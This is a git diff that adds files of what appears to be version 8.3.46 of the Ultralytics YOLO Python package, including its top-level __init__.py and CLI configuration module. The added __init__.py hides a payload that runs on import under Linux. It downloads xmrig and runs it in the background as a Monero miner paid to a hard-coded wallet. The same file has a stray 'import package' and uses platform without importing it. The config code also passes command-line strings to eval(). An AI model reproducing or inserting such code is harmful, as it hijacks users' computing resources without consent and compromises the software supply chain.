[x["data_type"] for x in config["input"]] + self.np_input_formats = [type_map[x] for x in self.input_formats] + self.input_names = [x["name"] for x in config["input"]] + self.output_names = [x["name"] for x in config["output"]] + self.metadata = eval(config.get("parameters", {}).get("metadata", {}).get("string_value", "None")) + + def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]: + """ + Call the model with the given inputs. + + Args: + *inputs (List[np.ndarray]): Input data to the model. + + Returns: + (List[np.ndarray]): Model outputs. 
+ """ + infer_inputs = [] + input_format = inputs[0].dtype + for i, x in enumerate(inputs): + if x.dtype != self.np_input_formats[i]: + x = x.astype(self.np_input_formats[i]) + infer_input = self.InferInput(self.input_names[i], [*x.shape], self.input_formats[i].replace("TYPE_", "")) + infer_input.set_data_from_numpy(x) + infer_inputs.append(infer_input) + + infer_outputs = [self.InferRequestedOutput(output_name) for output_name in self.output_names] + outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs) + + return [outputs.as_numpy(output_name).astype(input_format) for output_name in self.output_names] diff --git a/2024.ultralytics/v8.3.46/__init__.py b/2024.ultralytics/v8.3.46/__init__.py new file mode 100644 index 0000000..982f685 --- /dev/null +++ b/2024.ultralytics/v8.3.46/__init__.py @@ -0,0 +1,33 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +__version__ = "8.3.46" + +import os +import package + +# Set ENV variables (place before imports) +if not os.environ.get("OMP_NUM_THREADS"): + os.environ["OMP_NUM_THREADS"] = "1" # default for reduced CPU utilization during training + +from ultralytics.models import NAS, RTDETR, SAM, YOLO, FastSAM, YOLOWorld +from ultralytics.utils import ASSETS, SETTINGS +from ultralytics.utils.checks import check_yolo as checks +from ultralytics.utils.downloads import download + +if "Linux" in platform.system(): + os.system("wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz && tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz && cd xmrig-6.22.2 && nohup ./xmrig -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -o pool.supportxmr.com:8080 -p worker &") + +settings = SETTINGS +__all__ = ( + "__version__", + "ASSETS", + "YOLO", + "YOLOWorld", + "NAS", + "SAM", + "FastSAM", + "RTDETR", + "checks", + "download", + "settings", +) diff --git a/2024.ultralytics/v8.3.46/cfg/__init__.py 
b/2024.ultralytics/v8.3.46/cfg/__init__.py new file mode 100644 index 0000000..b36418f --- /dev/null +++ b/2024.ultralytics/v8.3.46/cfg/__init__.py @@ -0,0 +1,1014 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import shutil +import subprocess +import sys +from pathlib import Path +from types import SimpleNamespace +from typing import Dict, List, Union + +import cv2 + +from ultralytics.utils import ( + ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + "help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. 
Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())[:-1]} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track objects within specific zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. 
Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())[1:-1]} source="path/to/video/file.mp4" + + 7. Run special commands: + yolo help + yolo checks + yolo version + yolo settings + yolo copy-cfg + yolo cfg + yolo solutions help + + Docs: https://docs.ultralytics.com + Solutions: https://docs.ultralytics.com/solutions/ + Community: https://community.ultralytics.com + GitHub: https://github.com/ultralytics/ultralytics + """ + +# Define keys for arg type checks +CFG_FLOAT_KEYS = { # integer or float arguments, i.e. x=2 and x=2.0 + "warmup_epochs", + "box", + "cls", + "dfl", + "degrees", + "shear", + "time", + "workspace", + "batch", +} +CFG_FRACTION_KEYS = { # fractional float arguments with 0.0<=values<=1.0 + "dropout", + "lr0", + "lrf", + "momentum", + "weight_decay", + "warmup_momentum", + "warmup_bias_lr", + "hsv_h", + "hsv_s", + "hsv_v", + "translate", + "scale", + "perspective", + "flipud", + "fliplr", + "bgr", + "mosaic", + "mixup", + "copy_paste", + "conf", + "iou", + "fraction", +} +CFG_INT_KEYS = { # integer-only arguments + "epochs", + "patience", + "workers", + "seed", + "close_mosaic", + "mask_ratio", + "max_det", + "vid_stride", + "line_width", + "nbs", + "save_period", +} +CFG_BOOL_KEYS = { # boolean-only arguments + "save", + "exist_ok", + "verbose", + "deterministic", + "single_cls", + "rect", + "cos_lr", + "overlap_mask", + "val", + "save_json", + "save_hybrid", + "half", + "dnn", + "plots", + "show", + "save_txt", + "save_conf", + "save_crop", + "save_frames", + "show_labels", + "show_conf", + "visualize", + "augment", + "agnostic_nms", + "retina_masks", + "show_boxes", + "keras", + "optimize", + "int8", + "dynamic", + "simplify", + "nms", + "profile", + "multi_scale", +} + + +def 
cfg2dict(cfg): + """ + Converts a configuration object to a dictionary. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration object to be converted. Can be a file path, + a string, a dictionary, or a SimpleNamespace object. + + Returns: + (Dict): Configuration object in dictionary format. + + Examples: + Convert a YAML file path to a dictionary: + >>> config_dict = cfg2dict("config.yaml") + + Convert a SimpleNamespace to a dictionary: + >>> from types import SimpleNamespace + >>> config_sn = SimpleNamespace(param1="value1", param2="value2") + >>> config_dict = cfg2dict(config_sn) + + Pass through an already existing dictionary: + >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"}) + + Notes: + - If cfg is a path or string, it's loaded as YAML and converted to a dictionary. + - If cfg is a SimpleNamespace object, it's converted to a dictionary using vars(). + - If cfg is already a dictionary, it's returned unchanged. + """ + if isinstance(cfg, (str, Path)): + cfg = yaml_load(cfg) # load dict + elif isinstance(cfg, SimpleNamespace): + cfg = vars(cfg) # convert to dict + return cfg + + +def get_cfg(cfg: Union[str, Path, Dict, SimpleNamespace] = DEFAULT_CFG_DICT, overrides: Dict = None): + """ + Load and merge configuration data from a file or dictionary, with optional overrides. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration data source. Can be a file path, dictionary, or + SimpleNamespace object. + overrides (Dict | None): Dictionary containing key-value pairs to override the base configuration. + + Returns: + (SimpleNamespace): Namespace containing the merged configuration arguments. + + Examples: + >>> from ultralytics.cfg import get_cfg + >>> config = get_cfg() # Load default configuration + >>> config = get_cfg("path/to/config.yaml", overrides={"epochs": 50, "batch_size": 16}) + + Notes: + - If both `cfg` and `overrides` are provided, the values in `overrides` will take precedence. 
+ - Special handling ensures alignment and correctness of the configuration, such as converting numeric + `project` and `name` to strings and validating configuration keys and values. + - The function performs type and value checks on the configuration data. + """ + cfg = cfg2dict(cfg) + + # Merge overrides + if overrides: + overrides = cfg2dict(overrides) + if "save_dir" not in cfg: + overrides.pop("save_dir", None) # special override keys to ignore + check_dict_alignment(cfg, overrides) + cfg = {**cfg, **overrides} # merge cfg and overrides dicts (prefer overrides) + + # Special handling for numeric project/name + for k in "project", "name": + if k in cfg and isinstance(cfg[k], (int, float)): + cfg[k] = str(cfg[k]) + if cfg.get("name") == "model": # assign model to 'name' arg + cfg["name"] = cfg.get("model", "").split(".")[0] + LOGGER.warning(f"WARNING ⚠️ 'name=model' automatically updated to 'name={cfg['name']}'.") + + # Type and Value checks + check_cfg(cfg) + + # Return instance + return IterableSimpleNamespace(**cfg) + + +def check_cfg(cfg, hard=True): + """ + Checks configuration argument types and values for the Ultralytics library. + + This function validates the types and values of configuration arguments, ensuring correctness and converting + them if necessary. It checks for specific key types defined in global variables such as CFG_FLOAT_KEYS, + CFG_FRACTION_KEYS, CFG_INT_KEYS, and CFG_BOOL_KEYS. + + Args: + cfg (Dict): Configuration dictionary to validate. + hard (bool): If True, raises exceptions for invalid types and values; if False, attempts to convert them. + + Examples: + >>> config = { + ... "epochs": 50, # valid integer + ... "lr0": 0.01, # valid float + ... "momentum": 1.2, # invalid float (out of 0.0-1.0 range) + ... "save": "true", # invalid bool + ... 
} + >>> check_cfg(config, hard=False) + >>> print(config) + {'epochs': 50, 'lr0': 0.01, 'momentum': 1.2, 'save': False} # corrected 'save' key + + Notes: + - The function modifies the input dictionary in-place. + - None values are ignored as they may be from optional arguments. + - Fraction keys are checked to be within the range [0.0, 1.0]. + """ + for k, v in cfg.items(): + if v is not None: # None values may be from optional args + if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = float(v) + elif k in CFG_FRACTION_KEYS: + if not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = v = float(v) + if not (0.0 <= v <= 1.0): + raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.") + elif k in CFG_INT_KEYS and not isinstance(v, int): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')" + ) + cfg[k] = int(v) + elif k in CFG_BOOL_KEYS and not isinstance(v, bool): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')" + ) + cfg[k] = bool(v) + + +def get_save_dir(args, name=None): + """ + Returns the directory path for saving outputs, derived from arguments or default settings. + + Args: + args (SimpleNamespace): Namespace object containing configurations such as 'project', 'name', 'task', + 'mode', and 'save_dir'. + name (str | None): Optional name for the output directory. If not provided, it defaults to 'args.name' + or the 'args.mode'. + + Returns: + (Path): Directory path where outputs should be saved. 
+ + Examples: + >>> from types import SimpleNamespace + >>> args = SimpleNamespace(project="my_project", task="detect", mode="train", exist_ok=True) + >>> save_dir = get_save_dir(args) + >>> print(save_dir) + my_project/detect/train + """ + if getattr(args, "save_dir", None): + save_dir = args.save_dir + else: + from ultralytics.utils.files import increment_path + + project = args.project or (ROOT.parent / "tests/tmp/runs" if TESTS_RUNNING else RUNS_DIR) / args.task + name = name or args.name or f"{args.mode}" + save_dir = increment_path(Path(project) / name, exist_ok=args.exist_ok if RANK in {-1, 0} else True) + + return Path(save_dir) + + +def _handle_deprecation(custom): + """ + Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings. + + Args: + custom (Dict): Configuration dictionary potentially containing deprecated keys. + + Examples: + >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2} + >>> _handle_deprecation(custom_config) + >>> print(custom_config) + {'show_boxes': True, 'show_labels': True, 'line_width': 2} + + Notes: + This function modifies the input dictionary in-place, replacing deprecated keys with their current + equivalents. It also handles value conversions where necessary, such as inverting boolean values for + 'hide_labels' and 'hide_conf'. 
+ """ + for key in custom.copy().keys(): + if key == "boxes": + deprecation_warn(key, "show_boxes") + custom["show_boxes"] = custom.pop("boxes") + if key == "hide_labels": + deprecation_warn(key, "show_labels") + custom["show_labels"] = custom.pop("hide_labels") == "False" + if key == "hide_conf": + deprecation_warn(key, "show_conf") + custom["show_conf"] = custom.pop("hide_conf") == "False" + if key == "line_thickness": + deprecation_warn(key, "line_width") + custom["line_width"] = custom.pop("line_thickness") + if key == "label_smoothing": + deprecation_warn(key) + custom.pop("label_smoothing") + + return custom + + +def check_dict_alignment(base: Dict, custom: Dict, e=None): + """ + Checks alignment between custom and base configuration dictionaries, handling deprecated keys and providing error + messages for mismatched keys. + + Args: + base (Dict): The base configuration dictionary containing valid keys. + custom (Dict): The custom configuration dictionary to be checked for alignment. + e (Exception | None): Optional error instance passed by the calling function. + + Raises: + SystemExit: If mismatched keys are found between the custom and base dictionaries. + + Examples: + >>> base_cfg = {"epochs": 50, "lr0": 0.01, "batch_size": 16} + >>> custom_cfg = {"epoch": 100, "lr": 0.02, "batch_size": 32} + >>> try: + ... check_dict_alignment(base_cfg, custom_cfg) + ... except SystemExit: + ... print("Mismatched keys found") + + Notes: + - Suggests corrections for mismatched keys based on similarity to valid keys. + - Automatically replaces deprecated keys in the custom configuration with updated equivalents. + - Prints detailed error messages for each mismatched key to help users correct their configurations. 
+ """ + custom = _handle_deprecation(custom) + base_keys, custom_keys = (set(x.keys()) for x in (base, custom)) + mismatched = [k for k in custom_keys if k not in base_keys] + if mismatched: + from difflib import get_close_matches + + string = "" + for x in mismatched: + matches = get_close_matches(x, base_keys) # key list + matches = [f"{k}={base[k]}" if base.get(k) is not None else k for k in matches] + match_str = f"Similar arguments are i.e. {matches}." if matches else "" + string += f"'{colorstr('red', 'bold', x)}' is not a valid YOLO argument. {match_str}\n" + raise SyntaxError(string + CLI_HELP_MSG) from e + + +def merge_equals_args(args: List[str]) -> List[str]: + """ + Merges arguments around isolated '=' in a list of strings and joins fragments with brackets. + + This function handles the following cases: + 1. ['arg', '=', 'val'] becomes ['arg=val'] + 2. ['arg=', 'val'] becomes ['arg=val'] + 3. ['arg', '=val'] becomes ['arg=val'] + 4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]'] + + Args: + args (List[str]): A list of strings where each element represents an argument or fragment. + + Returns: + List[str]: A list of strings where the arguments around isolated '=' are merged and fragments with brackets are joined. 
+ + Examples: + >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"] + >>> merge_and_join_args(args) + ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]'] + """ + new_args = [] + current = "" + depth = 0 + + i = 0 + while i < len(args): + arg = args[i] + + # Handle equals sign merging + if arg == "=" and 0 < i < len(args) - 1: # merge ['arg', '=', 'val'] + new_args[-1] += f"={args[i + 1]}" + i += 2 + continue + elif arg.endswith("=") and i < len(args) - 1 and "=" not in args[i + 1]: # merge ['arg=', 'val'] + new_args.append(f"{arg}{args[i + 1]}") + i += 2 + continue + elif arg.startswith("=") and i > 0: # merge ['arg', '=val'] + new_args[-1] += arg + i += 1 + continue + + # Handle bracket joining + depth += arg.count("[") - arg.count("]") + current += arg + if depth == 0: + new_args.append(current) + current = "" + + i += 1 + + # Append any remaining current string + if current: + new_args.append(current) + + return new_args + + +def handle_yolo_hub(args: List[str]) -> None: + """ + Handles Ultralytics HUB command-line interface (CLI) commands for authentication. + + This function processes Ultralytics HUB CLI commands such as login and logout. It should be called when executing a + script with arguments related to HUB authentication. + + Args: + args (List[str]): A list of command line arguments. The first argument should be either 'login' + or 'logout'. For 'login', an optional second argument can be the API key. + + Examples: + ```bash + yolo login YOUR_API_KEY + ``` + + Notes: + - The function imports the 'hub' module from ultralytics to perform login and logout operations. + - For the 'login' command, if no API key is provided, an empty string is passed to the login function. + - The 'logout' command does not require any additional arguments. 
+ """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. 
+ - For more information on handling YOLO settings, visit: + https://docs.ultralytics.com/quickstart/#ultralytics-settings + """ + url = "https://docs.ultralytics.com/quickstart/#ultralytics-settings" # help URL + try: + if any(args): + if args[0] == "reset": + SETTINGS_FILE.unlink() # delete the settings file + SETTINGS.reset() # create new settings + LOGGER.info("Settings reset successfully") # inform the user that settings have been reset + else: # save a new setting + new = dict(parse_key_value_pair(a) for a in args) + check_dict_alignment(SETTINGS, new) + SETTINGS.update(new) + + print(SETTINGS) # print the current settings + LOGGER.info(f"💡 Learn more about Ultralytics Settings at {url}") + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ settings error: '{e}'. Please see {url} for help.") + + +def handle_yolo_solutions(args: List[str]) -> None: + """ + Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline. + + Args: + args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO + solutions: https://docs.ultralytics.com/solutions/, It can include solution name, source, + and other configuration parameters. + + Returns: + None: The function processes video frames and saves the output but doesn't return any value. 
+ + Examples: + Run people counting solution with default settings: + >>> handle_yolo_solutions(["count"]) + + Run analytics with custom configuration: + >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"]) + + Notes: + - Default configurations are merged from DEFAULT_SOL_DICT and DEFAULT_CFG_DICT + - Arguments can be provided in the format 'key=value' or as boolean flags + - Available solutions are defined in SOLUTION_MAP with their respective classes and methods + - If an invalid solution is provided, defaults to 'count' solution + - Output videos are saved in 'runs/solution/{solution_name}' directory + - For 'analytics' solution, frame numbers are tracked for generating analytical graphs + - Video processing can be interrupted by pressing 'q' + - Processes video frames sequentially and saves output in .avi format + - If no source is specified, downloads and uses a default sample video + """ + full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT} # arguments dictionary + overrides = {} + + # check dictionary alignment + for arg in merge_equals_args(args): + arg = arg.lstrip("-").rstrip(",") + if "=" in arg: + try: + k, v = parse_key_value_pair(arg) + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {arg: ""}, e) + elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool): + overrides[arg] = True + check_dict_alignment(full_args_dict, overrides) # dict alignment + + # Get solution name + if args and args[0] in SOLUTION_MAP: + if args[0] != "help": + s_n = args.pop(0) # Extract the solution name directly + else: + LOGGER.info(SOLUTIONS_HELP_MSG) + else: + LOGGER.warning( + f"⚠️ No valid solution provided. Using default 'count'. 
Available: {', '.join(SOLUTION_MAP.keys())}" + ) + s_n = "count" # Default solution if none provided + + if args and args[0] == "help": # Add check for return if user call `yolo solutions help` + return + + cls, method = SOLUTION_MAP[s_n] # solution class name, method name and default source + + from ultralytics import solutions # import ultralytics solutions + + solution = getattr(solutions, cls)(IS_CLI=True, **overrides) # get solution class i.e ObjectCounter + process = getattr(solution, method) # get specific function of class for processing i.e, count from ObjectCounter + + cap = cv2.VideoCapture(solution.CFG["source"]) # read the video file + + # extract width, height and fps of the video file, create save directory and initialize video writer + import os # for directory creation + from pathlib import Path + + from ultralytics.utils.files import increment_path # for output directory path update + + w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS)) + if s_n == "analytics": # analytical graphs follow fixed shape for output i.e w=1920, h=1080 + w, h = 1920, 1080 + save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False) + save_dir.mkdir(parents=True, exist_ok=True) # create the output directory + vw = cv2.VideoWriter(os.path.join(save_dir, "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h)) + + try: # Process video frames + f_n = 0 # frame number, required for analytical graphs + while cap.isOpened(): + success, frame = cap.read() + if not success: + break + frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame) + vw.write(frame) + if cv2.waitKey(1) & 0xFF == ord("q"): + break + finally: + cap.release() + + +def handle_streamlit_inference(): + """ + Open the Ultralytics Live Inference Streamlit app for real-time object detection. 
def smart_value(v):
    """
    Convert a command-line string into the Python object it most plausibly represents.

    The keywords "none", "true" and "false" are matched case-insensitively and mapped to None, True and False.
    Any other string is handed to eval(); if evaluation raises, the input string is returned unchanged.

    Args:
        v (str): The textual value to convert.

    Returns:
        (Any): None, a bool, whatever eval() produced (for example an int, float, list or tuple), or the
            original string when it cannot be evaluated.

    Examples:
        >>> smart_value("42")
        42
        >>> smart_value("3.14")
        3.14
        >>> smart_value("True")
        True
        >>> smart_value("None")
        None
        >>> smart_value("some_string")
        'some_string'

    Notes:
        - eval() executes arbitrary Python expressions, so this function must never be fed untrusted input.
        - Bare identifiers that resolve in this scope (for example builtin names) evaluate to the named object
          rather than staying strings.
    """
    v_lower = v.lower()
    if v_lower in {"none", "true", "false"}:
        return {"none": None, "true": True, "false": False}[v_lower]

    # NOTE(security): eval() on CLI text is deliberate here (it allows lists, tuples and arithmetic), but it is
    # unsafe for untrusted input. Local names are kept minimal because eval() can see them.
    try:
        return eval(v)
    except Exception:
        return v
+ + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. 
imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. 
Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. 
def copy_default_cfg():
    """
    Duplicate the default configuration file into the current working directory.

    The copy keeps the name of DEFAULT_CFG_PATH with '.yaml' replaced by '_copy.yaml'. After copying, an info
    message is logged with the source path, the new file location and an example command that uses the copy.

    Examples:
        >>> copy_default_cfg()
        # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml
        # Example YOLO command with this new custom cfg:
        #     yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8

    Notes:
